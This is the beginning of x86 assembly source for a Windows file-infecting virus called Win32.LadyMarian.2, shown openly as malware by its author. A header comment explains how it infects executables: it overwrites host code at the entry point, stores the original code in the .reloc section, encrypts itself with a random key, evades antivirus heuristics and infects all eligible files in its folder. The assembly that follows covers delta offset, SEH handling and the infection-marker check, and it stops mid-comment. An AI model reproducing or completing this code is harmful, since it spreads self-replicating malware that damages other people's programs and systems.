;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;
;
; Win32.LadyMarian.2
; Coded By ValleZ.
; Size: 848h bytes.
;
; This is my second virus and probably virus had not optimized code,or bad ideas,or
; other things,but,as i said,its my second so im excused :P if its a lame virus.
; Well,i thing this is a interesting virus becoz it infect with a method that i hadnt seen
; before(however i dont say it no exist,but i havent seen it). Virus overwrite code
; of host,over entry point,after it has copy host code in .reloc.When it returns to host
; it copy again host to entry point and jmp there.Virus place return to host rutine in
; imagebase + 26h, in word oeminfo and 5 * dword reserved.
; Virus is encrypted with random key.
; Virus no change flags of code section where it overwrite code of host becoz avs heuristic
; could detect it. It use VirtualProtect api to set his memory as writable.
; I want to include some antidebug rutines in virus code but finally i think better not
; becoz size of virus is 848h bytes...and if it grow up very much probably it cannot infect
; any file becoz it will be more big than reloc.
; Virus doesnt increase size of file and no change entry point.
; It places his own SEH and test files with SfcIsFileProtected api when sfc.dll exists.
; It infects all files in his folder that can be infected.
; In NT machines only infect if it has necesary permission.
; In header it only change: ImageBase + 26h to ImageBase + 3ch,with code to return host.
; Byte 1 of TimeDateStamp in PEheader + 08h.
; Flags of .reloc to do it not discarcheable.
;
;
; Payload: show a message box with no button :P close it with ctrl + alt + supr
; No more things.
; This virus is for Lady Mariam,the best girl in the world.
;
; Thx:
; Xezaw,my m3nt0r who shows me all i know :)
; mscorlib,thx for that help that u gave me :) u r a genius :D
; GriYo,thx u too for ur help too :)
;
; Sorry,my english is very bad so plz,excuse me.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.586p
.model flat,stdcall
extrn ExitProcess:proc
sizeVir = endVir - startVir
sizecrypt = decryptz - retHost
.data
db 0
.code
start:
startVir:
push ebx ;registers preserved too
push ecx
push edx
push esi
push edi
push ebp
call d_offset ;delta offset
d_offset:
pop ebp
sub EBP,offset d_offset
jmp decryptz
retHost:
SEHout:
mov esp,00000000h
pop dword ptr fs:[0] ;SEH return
pop ebp
pop ebp ;ebp too was saved,so we can restore it
lea eax,[ebp + offset baseCalc]
xor al,al
xor ecx,ecx
mov cx,100h
add eax,ecx
baseCalc:
sub eax,ecx
cmp word ptr [eax],'ZM' ;search for image base
jne baseCalc
mov esi,[eax + 1ch] ;dir of reloc
add esi,eax ;this header dword is modified
;when file is infected
mov ecx, [eax+3Ch]
add ecx, eax
mov dx,[ecx + 8]
cmp dx,'vz' ;test if this is a infected file,
jne Exit ;second generation,i no test it with
;or ebp,ebp becoz
;with this infection method
;sometimes ebp = 0 in 2